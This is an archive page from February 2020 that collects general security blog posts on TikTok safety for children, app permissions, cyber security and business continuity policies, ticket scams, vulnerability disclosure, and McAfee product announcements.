Monthly Archives: February 2020

Is the TikTok App Safe for Kids?

TikTok safety

Everyone’s talking about the TikTok app. In addition to talking, tweens and teens are swiping, laughing, and sharing TikTok videos. Meanwhile, parents are concerned with one thing: Is TikTok safe?

What is TikTok?

Based out of China, TikTok is a video-based social networking app that replaced the Musical.ly app, which ended its digital run in 2017. The app allows users to create an account, make and post short 15-60-second videos, as well as view, comment on, and share videos from other users. According to reports, TikTok has 1 billion active users in 155 countries. Approximately 60 percent of TikTok’s audience is between 16 and 24. Guidelines state that anyone 12+ can use the app, though there’s no age-verification process.

Why Do Kids Love TikTok?

TikTok is the latest and greatest digital hangout that has become the main channel for kids to discover new and creative ways to express themselves. They can follow their interests, be entertained, and be rewarded with views, likes, and shares for their artistic efforts. Tik Tok has built-in editing tools, free music, and dialogue clips, and filters that make creating videos easy for any skill level. Users can share funny sketches, lip-sync videos, and spontaneous, personal raves or rants. According to app reviews posted by teens, TikTok is also a go-to creative outlet, a place to de-stress, and a confidence-builder.

What are the risks?

Apps aren’t inherently risky. Rather, it’s the way individuals use an app that puts themselves or others at risk. That’s why understanding how your kids engage on TikTok, and how to make the experience as safe as possible, is important. Here are some of the risks your child could encounter on TikTok:

Contact from strangers. According to news reports, predators use TikTok to connect with kids. Anyone who follows a TikTok user can privately message them and initiate private conversations outside of the app.

Exposure to mature content and lyrics. Apps attract users of all ages, which means if your child has a TikTok account, he or she has access to the public video feed. With 1 billion users, your child will likely see videos containing sexually suggestive or explicit images and hear explicit lyrics (we saw and heard plenty). They may even unknowingly use music clips for their videos that contain explicit lyrics.

Spam and malware. Recent reports reveal software flaws that could potentially open up TikTok accounts to a range of malicious attacks. Researchers say hackers could have exploited the flaws to send legitimate-looking text messages loaded with malware, made private videos public, and accessed personal data.

Excessive screentime. TikTok is a curiosity magnet for kids, which can lead to excessive screen time, lack of sleep, and a host of other negative outcomes from too much time online.

TikTok safety

Cyberbullying. TikTok users have been known to create “cringe compilations,” which are videos they deem to be odd, uncool, or cringe-worthy. Several of these cruel compilations have been posted outside of TikTok and have gone viral.

Quest for likes. As with any social network, some users can become preoccupied with amassing views, likes, and followers. This obsession can lead to bad decisions, risky behavior (such as challenges), cyberbullying, and sharing harmful content.

Oversharing. Some kids share their daily activities through TikTok videos and inadvertently expose personal information such as their school, their location, home address, and other personal data.

10 Family Safety Tips

Should you allow your child to use TikTok? The answer to that question depends on a few things, including the age of the child using the app and how they use it. Here are a few tips that may help in that decision.

  1. Download the app. The best way to understand TikTok is to download it, create an account, and explore. Take some solo time to search a few hashtags, scroll some feeds, and get a feel for the content. Visit the app’s safety center for an overview of safety tools. Visit the privacy center to see how your child’s data is being used.
  2. Go through the app together. Sit and browse content with your child. Discuss the pros and cons of the content and how it does or doesn’t align with your family’s digital ground rules.
  3. Max privacy settings. By making a TikTok account private, only approved followers (known friends) can view your child’s videos or send your child messages. When an account is public, anyone can comment, send messages, or share your child’s videos.
  4. Explore restricted mode. TikTok has a Restricted Mode for minors that will allow you to filter out inappropriate content.
  5. Explore Family Safety Mode. This TikTok feature allows a parent to link their TikTok account to their child’s to manage screen time, direct messages, set restrictions, and control friend and comment filters.
  6. Control interactions. Users can disable comments on a specific video, block people they don’t know from following them, and report abuse.
  7. Monitor social circles. Kids can change privacy settings and eventually be wooed into making more connections and getting more exposure. Consider monitoring who your child follows and who is following them. Consider the TikTok influencers they follow and the type of content they share.
  8. Monitor screen time. It’s easy to burn through countless hours on TikTok. The app has a digital wellbeing element that alerts users every two hours. Consider filtering software that adds another way to set screen limits.
  9. Talk about being an upstander. Creating and sharing original content online takes courage — and attracts bullies, making TikTok a potentially unsafe environment for kids. Encourage your child to be an upstander online and offer encouragement and support to peers when needed.
  10. Block the app. If you determine TikTok’s content isn’t a good fit for your family or that the risks outweigh the opportunities, both Android and iOS have built-in parental controls in Settings that allow you to block any app (consider rechecking these settings weekly).

One look at today’s headlines, and it’s tempting for a parent to want to delete every app like TikTok. Only we know a similar app will soon surface. Another approach is to jump into the digital mix. Know what apps your kids love and why. Understand how they use their favorite apps and who they are talking to. And, always remember: It’s never too early or too late to start these critical conversations with your kids. You’ve got this, parents!

The post Is the TikTok App Safe for Kids? appeared first on McAfee Blogs.

Posture management: Cloud security tools rise in wake of breaches

High-profile breaches have sparked interest in an emerging class of security software. The technology, named cloud security posture management (CSPM), scours cloud environments and alerts staff to configuration issues and compliance risks, most of which stem from human error.

Exhibit A of this type of gaffe occurred at Capital One in 2019, when a former Amazon Web Services (AWS) employee exploited a misconfigured Web Application Firewall (WAF) the financial service provider was using as part of its operations hosted in AWS, exfiltrated data and stored it on GitHub. In 2018, both a Walmart partner and GoDaddy were exposed when they left AWS storage instances accessible via the internet.

To read this article in full, please click here

(Insider Story)

Helping Developers with Permission Requests


User trust is critical to the success of developers of every size. On the Google Play Store, we aim to help developers boost the trust of their users, by surfacing signals in the Developer Console about how to improve their privacy posture. Towards this aim, we surface a message to developers when we think their app is asking for permission that is likely unnecessary.
This is important because numerous studies have shown that user trust can be affected when the purpose of a permission is not clear.1 In addition, research has shown that when users are given a choice between similar apps, and one of them requests fewer permissions than the other, they choose the app with fewer permissions.2
Determining whether or not a permission request is necessary can be challenging. Android developers request permissions in their apps for many reasons - some related to core functionality, and others related to personalization, testing, advertising, and other factors. To do this, we identify a peer set of apps with similar functionality and compare a developer’s permission requests to that of their peers. If a very large percentage of these similar apps are not asking for a permission, and the developer is, we then let the developer know that their permission request is unusual compared to their peers. Our determination of the peer set is more involved than simply using Play Store categories. Our algorithm combines multiple signals that feed Natural Language Processing (NLP) and deep learning technology to determine this set. A full explanation of our method is outlined in our recent publication, entitled “Reducing Permissions Requests in Mobile Apps” that appeared in the Internet Measurement Conference (IMC) in October 2019.3 (Note that the threshold for surfacing the warning signal, as stated in this paper, is subject to change.)
We surface this information to developers in the Play Console and we let the developer make the final call as to whether or not the permission is truly necessary. It is possible that the developer has a feature unlike all of its peers. Once a developer removes a permission, they won’t see the warning any longer. Note that the warning is based on our computation of the set of peer apps similar to the developers. This is an evolving set, frequently recomputed, so the message may go away if there is an underlying change to the set of peers apps and their behavior. Similarly, even if a developer is not currently seeing a warning about a permission, they might in the future if the underlying peer set and its behavior changes. An example warning is depicted below.

This warning also helps to remind developers that they are not obligated to include all of the permission requests occurring within the libraries they include inside their apps. We are pleased to say that in the first year after deployment of this advice signal nearly 60% of warned apps removed permissions. Moreover, this occurred across all Play Store categories and all app popularity levels. The breadth of this developer response impacted over 55 billion app installs.3 This warning is one component of Google’s larger strategy to help protect users and help developers achieve good security and privacy practices, such as Project Strobe, our guidelines on permissions best practices, and our requirements around safe traffic handling.
Acknowledgements
Giles Hogben, Android Play Dashboard and Pre-Launch Report teams

References

[1] Modeling Users’ Mobile App Privacy Preferences: Restoring Usability in a Sea of Permission Settings, by J. Lin B. Liu, N. Sadeh and J. Hong. In Proceedings of Usenix Symposium on Privacy & Security (SOUPS) 2014.
[2] Using Personal Examples to Improve Risk Communication for Security & Privacy Decisions, by M. Harbach, M. Hettig, S. Weber, and M. Smith. In Proceedings of the SIGCHI Conference on Human Computing Factors in Computing Systems, 2014.
[3] Reducing Permission Requests in Mobile Apps, by S. T. Peddinti, I. Bilogrevic, N. Taft, M Pelikan, U. Erlingsson, P. Anthonysamy and G. Hogben. In Proceedings of ACM Internet Measurement Conference (IMC) 2019.

How to develop a robust cyber security policy

Technological defences and staff training are two of the most frequently touted measures for preventing data breaches, but their effectiveness is dependent on the way organisations implement them.

This is a lesson organisations must learn quickly amid the COVID-19 pandemic, with a series of new information security risks surrounding their new, temporary work set-ups. Many employees are being asked to work from home, including some who using their personal devices.

Meanwhile, some organisations are already seeing depleted workforces due to illness or furloughs, meaning the remaining staff have to pick up more of the slack – and with IT teams having less oversight over the now-dispersed organisational infrastructure, there is less they can do to prevent the mounting threat of cyber attacks.

So how can you stay on top of these requirements during this turbulent time? The answer is to create or update an cyber security policy.

What is a cyber security policy?

A cyber security policy outlines an organisation’s cyber security defence strategy. Specifically, it explains the assets that must be protected, the threats to those assets and the controls that have been implemented to tackle them.

It’s only by documenting these that you can be sure that your organisation is approaching cyber security comprehensively and efficiently.


What a cyber security policy should include

All cyber security policies should include information on:

  • Which controls the organisation has implemented and the threats they address. For example, endpoints should be protected with antivirus software and firewalls
  • How updates and patches will be applied to limit the attack surface and plug application vulnerabilities. For example, organisations should regularly update browser, operating system and other Internet-facing applications
  • How data will be backed up. For example, organisations might choose to automatically back up their data to an encrypted Cloud server with multi-factor authentication

Cyber security policies should also identify who issued the policy, who is responsible for maintaining and enforcing it, who will respond to and resolve security incidents and which users have admin rights.


Employees and your cyber security policy

No matter how resilient your cyber security strategy is, you must always account for employees’ susceptibility to mistakes.

This might be the result of carelessness – such as misplacing files – or the result of targeted attacks from crooks. Phishing is one of the most common tactics in cyber crime because it circumvents many of the measures that organisations adopt to protect their organisation, instead going directly at employees.

Those who are unable to spot the signs of a malicious email will expose their sensitive information or leave the organisation open to catastrophic damage, such as a ransomware infection.

A cyber security policy will mitigate these risks, explaining to employees how they can protect sensitive information in various scenarios.

It should also address what happens when an employee doesn’t follow protocol. The specific actions will depend on the circumstances, but in most cases you’ll discipline, or possibly even fire, some for deliberately flouting the rules.

However, as cyber security expert William H. Saito notes, you should be more cautious if the breach was an honest mistake:

Making a user who has been compromised feel like the ‘bad guy’ will only exacerbate an already bad situation.

It can lead to an environment in which people try to fix issues themselves or, worse, simply hide or ignore them and, most importantly, fail to communicate the incident quickly.

Organisations should also take some accountability when an employee makes a mistake, as it suggests that staff awareness training is lacking – whether that’s because the course content isn’t adequate or that sessions aren’t being performed regularly enough.

Part of your response to a security incident should be to review all of your defence measures, which includes your cyber security policy, training programmes and technologies.


Creating a cyber security policy

The content of your policy will depend on specific issues that you’ve identified when performing a risk assessment. That said, there are some universal issues that every organisation should account for, such as:

  • Software updates

Software providers regularly release patches to fix identified vulnerabilities. Once the update is announced, the vulnerability is made public – which means cyber criminals can look to exploit it.

That’s why organisations must have a patch policy in place to ensure updates are applied as soon as they are released.

  • Acceptable Internet use

Employees should be given a degree of leeway when it comes to accessing non-work-related content on company devices; after all, everyone is entitled to breaks.

However, organisations should be careful about just how much freedom they’re afforded. Untrustworthy sites, especially those that encourage users to download content, can be used to infect the device with malware.

  • Remote access

Remote working has become a standard part of modern business, thanks to the growing popularity of working from home and on the road.

Unfortunately, public Wi-Fi and employees’ home connections are less secure than your internal network, because it’s not subject to the rigorous defences you’ve implemented, such as firewalls.

Likewise, unlike your internal network, there’s no guarantee that only your employees have access.

As such, you should establish controls that prevent remote workers from accessing sensitive company information. This reduces the damage in the event that an employees’ account is compromised.

  • Creating strong passwords

Weak passwords are one of the biggest security problems that organisations face. Even though most employees are aware of the importance of strong login credentials, too many of them don’t think beyond obvious phrases such as ‘123456’ and ‘qwerty’.

Your cyber security policy should urge staff to create stronger passwords by outlining rules.

There are several schools of thought on what makes a strong password, the most common of which is that credentials should contain a combination of at least eight upper- and lowercase letters, numbers and special characters.

The problem with this method is that the result can be hard to remember. “Did I replace the ‘o’ with a ‘0’ or the ‘l’ with a ‘1’?”, for example.

One way around this is to make your password a code; a popular technique is to use the first letter from a sentence that uses each of those characters. For instance, “My first son was born in July ’01” becomes “MfswbiJ’01”.

You can also use the length of your password to your advantage; every additional character you add is one that a cyber criminal has to guess.

As such, three random words – with no special characters or numbers – is often more secure than a complex cipher such as the example above.

Your policy doesn’t need to specify one approach over another; some employees will be more comfortable with one approach and others with an alternative. The important thing is that staff break out of the habit of simple passwords that can be cracked instantly.


Does your policy account for your new work environment?

The most significant change in the way organisations are operating during the COVID-19 pandemic is the number of employees working from home.

Remote workers face a wide variety of challenges – particularly when there aren’t people still in the office who can pick up tasks that would require the security benefits that come with working on the premises.

Our Remote Working Policy Template provides essential documentation on the issues you must address to protect you and your staff during the pandemic.

With this template, you can ensure that employees understand their responsibilities while working from home and take appropriate steps to keep their devices secure.

It includes guidance on topics such as password management, backups, the use of unauthorised software and device maintenance.

Find out more


A version of this blog was originally published on 3 January 2018.

The post How to develop a robust cyber security policy appeared first on IT Governance UK Blog.

Burning Man Is Coming: How to Watch out for Ticket Scammers

As the winter months fade and spring begins to creep up, many millennials and Gen Zers set their sights on festival season. Whether they plan on attending Coachella, Stagecoach, Outside Lands, Lollapalooza, or Governor’s Ball, festivalgoers across the world anxiously begin to look for cheap or discounted tickets in the hope of enjoying these events as affordably as possible. This eagerness, however, provides scammers with an opportunity to scam attendees out of hundreds of dollars, as well as the experiences themselves. In fact, according to Threatpost, ticket scammers have recently set their sights on wishful Burning Man attendees.

How This Burning Man Scam Works

The dystopian, futuristic festival that is Burning Man takes place in late August through early September, attracting tens of thousands of people from around the world and all walks of life. While truly an immersive experience, the festival can be quite expensive. So, it’s no wonder that burners – the nickname given to festival attendees – would be eager to find the cheapest price for their tickets. With this scam in particular, fake Burning Man concert organizers are offering passes in what researchers say is a very convincing and sophisticated effort. These tricksters have set up a fake website that closely mimics the official Burning Man site to fool visitors into thinking it’s the real deal.

How to Stay Secure

Seasoned festivalgoers know that ticket scammers are out there. But as the traps become more sophisticated, it’s vital that they know how to spot “too good to be true” deals. To avoid being burned by tricksters, follow these tips:

  • Only buy tickets from reputable vendors. While purchasing a cheap ticket from a third-party vendor is tempting, buying a ticket from the actual festival site rather than one that offers a good deal is the way to go. If not, you risk not only losing money but also the festival experience.
  • Carefully inspect any site before entering payment details. Burning Man’s official website features event history, an invitation to collaborate, press releases, archives from past festivals, and more – so make sure to scan for a variety of pages to confirm that the site is the real deal. Adding to that, be sure to also inspect URLs for suspicious characters.
  • Use payment that’s protected. If for some reason you do fall victim to a scam, most credit card companies help you get your money back in event of fraud. Additionally, PayPal offers buyer protection when paying for “Goods or Services” that allows you to chargeback, just as long as you don’t pay as “friends and family,” which means no buyer protection.
  • Monitor your online accounts. You’re never too young to start monitoring your credit! Be sure to regularly inspect your account for suspicious activity. If you do suspect your data or account has been compromised, place a fraud alert on your credit.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Burning Man Is Coming: How to Watch out for Ticket Scammers appeared first on McAfee Blogs.

How vulnerability disclosure keeps you and your family safe

Surrounded by smart home devices as well as apps which integrate with other services, we are entering an age of consumer technology where everything can talk to everything. For most consumers, this will just feel like the next logical step in a technological advancement which has been going on for decades.

This year, we will see more companies announce more new smart products than ever before, and we know that while some of these devices and services will become enormously successful, others will sink without a trace. From doorbells, kitchen scales and coffee cups to fridges and even cars, thousands of companies are racing to build the next generation of smart – and nobody knows for sure what will take off.

What we do know for sure, however, is the potential threat that it can represent – or, for cybercriminals, the opportunity. While, for home users, having products which talk to each other goes along with portability and power as a part of general technological progress, in terms of security this change is unlike anything else. Every IoT device we buy is another route that an attacker might use to do damage and make money. With so many options around, how can you buy in to the convenience of connected devices in your home while also ensuring that you’re keeping yourself safe? Fundamentally, it’s not about whether products might have vulnerabilities, but how companies react when vulnerabilities are found.

Everything connected

There is no single type of cyberattack used against connected consumer technology. At their simplest, attacks on unsecured IoT consumer devices might affect only the device itself. For instance, a smart lightbulb might be taken over and its internet connection used as a tool to attack other targets: concerning, but not directly damaging to the lightbulb’s owner. These attacks are more troubling, however, when the attacker is stealing not just an internet connection, but its owner’s identity by compromising their login details.

An even more serious concern for users will be situations where a device’s functionality can be controlled by somebody other than the owner. Recently, McAfee’s Advanced Threat Research team found a worrying example of this where a smart garage door can be tricked into opening when the owner thinks they are closing it remotely – for instance, after opening it to allow a package to be delivered while they are at work. Our team also found a vulnerability in a smart plug which, when carefully exploited, can potentially grant access to anything else on the same home network, such as computers, televisions, and security systems. And, most recently, we also identified a new vulnerability in autonomous vehicles which I discuss in a previous blog.

Working together

Finding vulnerabilities which an attacker might be able to take advantage of is a difficult and highly specialised job. At McAfee, our research teams use techniques similar to those that criminals might employ to try and get there first.

Of course, telling the world about these problems as soon as we find them would give criminals a chance to use them before the companies that make the products have chance to solve them. That’s why we, like other organisations doing this kind of work, follow a responsible disclosure policy: first, we tell the company concerned about what we found, and then, after a set period of time, we log a public notice (like this one for the smart plug vulnerability) which puts this information in the public domain. That way, businesses have both the time and the motivation to fix the flaw.

The good news is that all of this gives us specific steps to take which can help ensure that our connected lives are also secure lives:

  • Research products up front: searching for the product name plus ‘vulnerability’ should quickly show whether any research teams have identified problems with it, whether they’ve been fixed.
  • Give cybersecurity researchers time: while brand new products are exciting, choosing a device which has been on the market for some time makes it more likely that any major vulnerabilities will have been discovered.
  • Keep your technology updated: being connected means that problems with IoT devices are usually fixable with new software, so regularly checking for any new updates will minimise the chances of being caught out.

While groups like the McAfee Advanced Threat Research team are working hard to find potential attacks, it is also critical that the companies making these products have what we call vulnerability disclosure programmes. These programmes are used to encourage research groups to probe the security of the products and reassure the world that the company will respond positively where vulnerabilities are found. These steps, after all, are only useful if companies are actively seeking to ensure that their products are secure.

For example, leading smart lightbulb manufacturer Philips has a dedicated webpage explaining how to safely report a vulnerability to the company – meaning that if and when a problem is found, the details will be seen quickly by the right people and, hopefully, remedied. Apple and Google go one step further by offering bounties of up to $1 million for finding problems in their software, incentivising researchers to throw everything they have at uncovering issues. While it cannot guarantee safety, a vulnerability disclosure programme should be seen as a precondition for buying a connected device from a manufacturer.

By being smart about your home’s smart devices, together with familiar measures such as using strong, unique passwords, you can enjoy the convenience of connectivity while also protecting yourself online.

The post How vulnerability disclosure keeps you and your family safe appeared first on McAfee Blogs.

McAfee Named a 2020 Gartner Peer Insights Customers’ Choice for CASB

Gartner Peer Insights Customer Choice 2020

The McAfee team is proud to announce today that, for the third year in a row, McAfee was named a 2020 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers (CASB) for its MVISION Cloud solution. As the only CASB vendor to achieve this distinction three years in a row, we are so honored as customer feedback is essential in shaping our products and services.

In its announcement, Gartner explains, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, taking into account both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

Gartner Peer Insights Customer Choice 2020

For this distinction, a vendor must have a minimum of 50+ published reviews with an average overall rating of 4.5 stars or higher. McAfee received 90 reviews and an overall 4.6 rating for McAfee MVISION Cloud as of February 20, 2020.

Here are some excerpts from customers that contributed to this distinction:

“Best Option For Securing Data On Cloud”

“It provides high security of data and prevents the data leak. It’s not messy at all, UI is very simple with great dashboard where you can see anything like which system is browsing what kind of websites. “
Data and Analytics, Services Industry: Read full review here

“Cloud Visibility And Control Using MVision”

“The McAfee MVision product suite is a market leading solution, does what it says. Our ability to control shadow IT, provide visibility around sensitive data and control cloud applications has greatly improved as a result of the tool. The McAfee professional services team are also very knowledgeable and have been on hand to assist through the entire project lifecycle into operation.”
VP, Information Security Officer, Healthcare Industry: Read full review here

You can read all reviews for McAfee here

Everyone at McAfee is deeply proud to be named by customers as a 2020 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers. In October 2019, McAfee was named a Leader by analysts in Gartner’s “Magic Quadrant for Cloud Access Security Brokers.” Read the 2019 Magic Quadrant for Cloud Access Security Brokers here

To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights’ Customers’ Choice announcement for CASB. To all of our customers who submitted reviews, thank you! These reviews mold our products and our customer journey, and we look forward to building on the experience that earned us this distinction!

The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post McAfee Named a 2020 Gartner Peer Insights Customers’ Choice for CASB appeared first on McAfee Blogs.

Global Managed Detection and Response: Managing EDR Without the Red Bull

Staying on top of threats 24/7, 365 days a year can overwhelm the best SOC analysts. The need for constant vigilance of cyber threats, not to mention security tasks such as new tool installs, running reports and investigations, followed by reporting to exec levels is becoming unsustainable – just like your supply of energy drinks.

McAfee’s new Global Managed Detection and Response (MDR) service with DXC Technology will provide 24/7 critical alert monitoring, managed threat hunting, advanced investigations, and threat disruption 365 days a year.

An ESG survey reveals the struggles SOCs face to improve security postures with limited talent and resources:

  • 58% of organizations cite employee skills as a key security effectiveness gap
  • 72% say analytics is more difficult than two years ago
  • 70% report having many manual processes as a limiting factor

Global Managed Detection and Response supports McAfee’s “We put the customer first” mantra, freeing SOC analysts from unnecessary operational burdens and empowering security teams to strategically fight adversaries.

McAfee MVISION EDR and endpoint protection products are at the core of this new MDR service. MVISION EDR is an advanced cloud-delivered EDR solution that leverages McAfee’s massive threat intelligence data to provide visibility and advanced threat detection capabilities. In addition to identifying threats, MVISION EDR provides AI-guided investigation that helps analysts make sense of the alerts and guides the investigation process, automating the time-intensive task of collecting and pinpointing key artifacts that are vital to the incident. With the ability to scale to the size of any enterprise, MVISION EDR is the perfect solution to detect and prevent attacks.

DXC Technology is McAfee’s first partner providing threat hunting, advanced investigation and remediation coordination, and will introduce in the future a complete managed service with 24/7 critical alert monitoring.

DXC Technology has a global presence with the support of 3,500-plus security professionals with deep specializations including SOC analytics, forensic investigation, and threat intelligence.

By combining the global security expertise of DXC Technology with our sophisticated automated AI-guided investigations, it allows SOC analysts to focus on resolving the incident and not lose time sifting through noisy alerts. Inspired by the power of working together, McAfee and DXC Technology are enabling your teams to be freed from unnecessary operational burden and empowered to strategically fight adversaries. This high level of outside expertise can enable you to improve both your security posture and keep costs in check.

Whether you’re on the floor at RSA or at the W lobby bar, McAfee’s new Global Managed Detection and Response service with DXC Technology can turn your security conversation from how overwhelmed you are, to how much time you’ll have to disengage as well as how much money you’re going to save on Red Bull.

Learn more here.

 

The post Global Managed Detection and Response: Managing EDR Without the Red Bull appeared first on McAfee Blogs.

Can Mobile Networks Connect First Responders in Remote Areas?

The high plateaus of Colorado’s Rocky Mountains, known for panoramic vistas, wildlife, old gold mines and sports of all kinds, are attracting new pioneers: engineers working to improve emergency communications. First responders face many communications challenges, including a lack of cell towers in uninhabited places and incompatible equipment. Public safety agencies need to find ways to share voice, text, instant messages, video and data reliably while responding to wildland fires and other emergencies. Researchers with the National Institute of Standards and Technology (NIST), in

How to write a business continuity plan: the easy way

Earthquake. Virus. Cyber attack. The threat of disruption looms over organisations more than ever, thanks to the increasing use of technology in business processes, consumer expectations and the rapid rise in cyber crime.

You’ll rarely get advance warning about when a disruption will occur, which is why you need a BCP (business continuity plan).

In this blog, we explain how a BCP works, what it covers and how to create one.


What is a business continuity plan?

A BCP outlines the processes and procedures that an organisation must follow in the event of a disruption.

The plan must identify relevant risks that could cause issues, be they cyber attacks, internal vulnerabilities, weather events ­or technological problems.

Each identified risk should be accompanied with a set of temporary measures or quick fixes that ensure the most important business operations remain functional.

Organisations’ top priorities tend to be their technologies – and for good reason. Network connections, online systems, phone lines, network drives, servers and business applications are all vulnerable to a range of disruptions and can cause huge headaches if they are compromised.

But business continuity planning isn’t just about recovering IT functions. It’s primarily concerned with critical activities that, if disrupted, could immediately jeopardise your productivity or the availability of your services.

In that regard, business continuity considers IT one of several critical resources for preserving those activities.

However, restoring your IT may take some time, so you should have a plan on how to manage in the meantime. Such temporary solutions may well be lo-fi, such as completing processes with pen and paper.

Whatever methods you choose, they must be documented in a BCP so that employees know how to proceed.


Why is a business continuity plan important?

The most obvious reason to implement a BCP is to ensure that your organisation remains productive in the event of a disruption.

Customers must still be able to use your services, employees must be able to continue doing their job and you can’t allow yourself to face a huge backlog of work as delays continue.

But business continuity isn’t only about short-term goals. The cyber security landscape has become increasingly volatile in recent years, with cyber crime continuing to spiral and organisations’ reliance on technology leading to vast numbers of accidental and deliberate data breaches.

As a result, organisations need to prove to customers and stakeholders that they are prepared for anything.

Business continuity is especially important for OES (operators of essential services) and DSPs (digital service providers), as the delays could either be widespread or cause major headaches.

To ensure that such organisations are sufficiently prepared for risks, the EU adopted the NIS Directive, which was transposed into UK law as the NIS (Network and Information Systems) Regulations 2018.

DSPs within the Regulations’ scope are explicitly required to put business continuity measures in place. Although the same isn’t true of OES, they should still consider implementing a BCP as a means of providing a more reliable service.


Benefits of a business continuity plan

Creating a BCP will make it easier for your organisation to cope in a crisis and minimise the disruption for you and your customers.

A BCP can also reduce or even avoid the risk of losing revenue if you are hit with a disruption. Returning to business as usual promptly minimises the time that your organisation is unable to operate and therefore unable to generate revenue.

But beyond these reasons, you should also consider the BCP’s ability to:

  • Protect your organisation’s reputation

In demonstrating a fast and efficient response to disruption, the public will be impressed by the way you operate. This will mitigate any negative sentiments that accompany the loss of productivity – and it might even improve your reputation.

  • Boost employees’ morale

No one wants to work in a chaotic environment, so your staff will be pleased to know that management has a plan in case things go wrong.

If the plan is well written (which we’ll show you how to do shortly), everyone in the organisation will be accounted for, proving to employees that management has considered their needs.

  • Build your relationship with third parties and subsidiaries

An effective BCP demonstrates that the organisation is being run well from top to bottom, which will encourage anyone that you work with.

It shows that you are a reliable partner that has taken into account its responsibilities to customers, employees and third parties.


Who should have a business continuity plan?

All organisations, no matter their size, should create a BCP. Consider it a small investment that will save you a fortune when you suffer a data breach – and it is a matter of when, rather than if.

In the past year alone, 32% of organisations in the UK were breached, according to ICAS’s 2019 UK Cyber Security Breaches Survey. That percentage has grown steadily in the past few years, as has the associated costs of a data breach.

Organisations spent £4,180 on average responding to security incidents in 2019, compared to £3,160 in 2018 and £2,450.

The larger your organisation, the higher these costs will be. The report found that medium-sized businesses spent £9,270 on data breach recovery, and large businesses spent £22,700.


Key features of an effective business continuity plan

1. Purpose and scope

Your first task is to define the purpose and scope of the plan. This is especially relevant if your organisation comprises several subsidiaries or is based in different locations, as each one will have its own requirements.

If this is the case, it’s up to you to decide whether to create one plan that covers each subsidiary/location separately or to focus on just one part of your business.

2. Responsibilities

The next step is to decide which employee(s) will be responsible for enacting the plan. You might opt to put one person in charge of the plan or delegate responsibility to people across your organisation.

Small organisations might be able to get away with a single leader, as there’s a good chance that a senior member of staff will have oversight of every department and its needs. However, if that’s not the case, a group of employees will need to share responsibility.

You also need to identify who has the authority to grant financial costs outside of the normal department budget. This could be the same person (or people) responsible for enacting the plan, or it could be a specific duty assigned to someone else.

3. Plan invocation

This step defines when and how the plan will take effect. After all, it’s not always clear that a serious (and possibly planned-for) disruption has occurred; it’ll often begin with, say, the office lights going out and employees looking across the room at each other asking: ‘What’s going on?’

It’s only when someone takes charge that you can determine what caused the problem and how to respond.

You don’t need to get into specifics here (that’s covered in step five), but you do need to document who will get the process started, how response teams will be mobilised and where those responsible for enacting the plan should meet.

4. Developing the BCP

This is the meat of your plan, containing the actions you will take to recover from various incidents. It will be the result of two other processes – the risk assessment and BIA (business impact assessment) – in which you identify the threats you face and the way your organisation will be affected by them.

Once you’ve collected this information, you should take each business disruption and outline the steps that must be taken to protect individuals (staff, customers and third parties) during the business disruption and actions that should be taken to contain the disruption and prevent further loss, disturbance or unavailability of prioritised activities.

You should also use this opportunity to create guidelines on record-keeping requirements during and after the incident (such as what needs to be recorded and where), document the prioritised recovery objectives and the actions and resources that are needed to achieve them, and your internal and external (inter)dependencies, and how these might affect one another during a disruptive incident.

5. Communications

This stage focuses on internal and external communications. Internal communication refers to the way you will keep employees informed about the state of the business, something that’s particularly important if your usual modes of communication are disabled due to the disruption.

In the event of serious disruptions, you should also consider contacting employees’ next of kin to update them of their wellbeing. This is both thoughtful and prevents your organisation’s phone lines being jammed by concerned family members.

External communication refers to the way you will deal with the media regarding the incident. If the disruption is severe enough, you should release a statement explaining the nature of the incident, what has been affected and how you are responding.

In extreme cases, you might also be obliged to give interviews, in which case you should decide who will represent your organisation and what your strategy will be.

6. Stakeholders

You will be required to contact stakeholders as soon as possible following a disruption, so your BCP should contain their contact details for easy reference.

7. Document owner, approver and change history

The business continuity manager is the owner of the BCP and is responsible for ensuring that the procedure is reviewed and tested regularly.

8. Change management

Once the plan is finalised, it should be published in hard copy and as a digital file, and be made accessible to all members of staff.

Every time changes are made to the BCP, you must ensure that the digital and hard-copy forms are updated.


The importance of testing your business continuity plan

The only way to be sure that your plan works is by testing (or ‘validating’) it. How often you test the plan is up to you, but we recommend doing it at least twice a year or whenever there are substantial changes to your organisation.

There are three types of test that you can conduct:

The first are table-top exercises. This is essentially a read-through of the plan. Senior employees and those with BCP responsibilities should go through the plan together, looking for gaps and ensuring that all business units are represented.

Alternatively, you might choose to conduct a structured walkthrough. This is like a rehearsal, with each team member role-playing their responsibilities according to specified disruptions.

The objective is to familiarise employees with their responsibilities and to make sure the plan works as intended.

You might choose to simulate the process across the entire organisation, but it can obviously be difficult to make everyone available at the same time, particularly given that the walkthrough will probably have to occur outside of office hours.

As such, you might choose to split the walkthrough across the week, with one or two departments playing out a disaster at a time.

Finally, you might conduct a disaster simulation test, which is essentially a dress rehearsal. ou create a test environment that simulates an actual disaster across the entire organisation and then put the plan into action.

Unlike other types of test, you aren’t looking for gaps as you go. Instead, you should see the plan through to its conclusion, so you know exactly what the consequences of your actions (or lack thereof) are.

Only after you’ve seen the plan through to the end should you review your actions and look for ways to improve.


Use our free business continuity plan template

To help you with your BCP, we’ve created a free downloadable template.

This template outlines what should be included in a BCP that has been tailored to your organisation.

Download the template now >>

If you’re looking for more help creating your BCP, you might be interested in our BCMS Documentation Toolkit.

It contains templates of everything you need to implement a ISO 22301-compliant BCMS, helping you save time and money.

Learn more


